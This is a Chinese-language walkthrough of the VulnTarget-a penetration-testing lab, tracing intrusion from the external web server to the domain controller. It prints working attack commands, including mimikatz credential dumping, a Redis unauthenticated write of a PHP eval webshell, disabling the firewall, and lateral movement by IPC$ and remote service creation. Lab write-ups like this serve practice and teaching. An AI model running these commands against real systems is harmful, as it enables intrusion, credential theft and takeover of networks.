VulnTarget-a 靶场通关记录:从外网打点到域控拿下
下载地址链接夸克网盘分享提取码7teNkali攻击机192.168.20.130靶机IPcentos/192.168.139.197windows/winserver/环境信息域控-win2019账号administrator密码Admin666IP10.0.10.110域成员-2016账号Administrator密码Admin123账号 vulntarget.com \win2016密码Admin#123IP110.0.10.111IP210.0.20.99win7密码admin外网IP192.168.5.107内网IP10.0.20.98打点通关边机web访问192.168.5.107发现是通达OA的框架直接工具利用蚁剑连接接下来上线CS获取明文密码和hashmimikatz privilege::debug mimikatz sekurlsa::logonpasswords信息收集发现是双网卡存在10.0.20.1/24网段并且该主机不在域内然后进行网段扫描探测存活主机开启代理转发修改 Kali/etc/proxychains4.conf端口扫描proxychains4 nmap -Pn -T4 -p 80,6379,445,135,3389 10.0.20.99或者CS上运行shell powershell $tcpNew-Object System.Net.Sockets.TCPClient;try{$tcp.Connect(10.0.20.99,80);echo 80开放;$tcp.Close()}catch{echo 80关闭}获取20段的权限域成员直接配置浏览器代理然后访问http://10.0.20.99开放6379端口利用redis未授权访问getshellproxychains4 redis-cli -h 10.0.20.99之后的话需要寻找路径目录扫描之后发现有个phpinfo然后写入木马CONFIG SET dir C:\\phpStudy\\PHPTutorial\\WWW CONFIG SET dbfilename shell.php SET webshell ?php eval($_POST[cmd]); ? SAVE然后访问这个shell.php自己本机设置kali的代理然后连接shell上线CS关闭防火墙netsh advfirewall set currentprofile state offwin2016上线信息收集shell ipconfig /all shell systeminfo发现存在10.0.10.111/24新内网网段存在域,在vulntarget.com域中域控存在明文密码尝试ipc$:建⽴IPC$连接 shell net use \\10.0.10.110\ipc$ /user:Administrator Admin666以2016为跳板转发上线将生成木马上传到2016中然后通过copy上传到2019靶机shell copy C:\phpStudy\PHPTutorial\WWW\1111.exe \\10.0.10.110\c$\Windows\Temp\1111.exe启动服务shell sc \\10.0.10.110 create test binpath \cmd.exe /c C:\Windows\Temp\1111.exe\ shell sc \\10.0.10.110 start test等待上线即可

相关新闻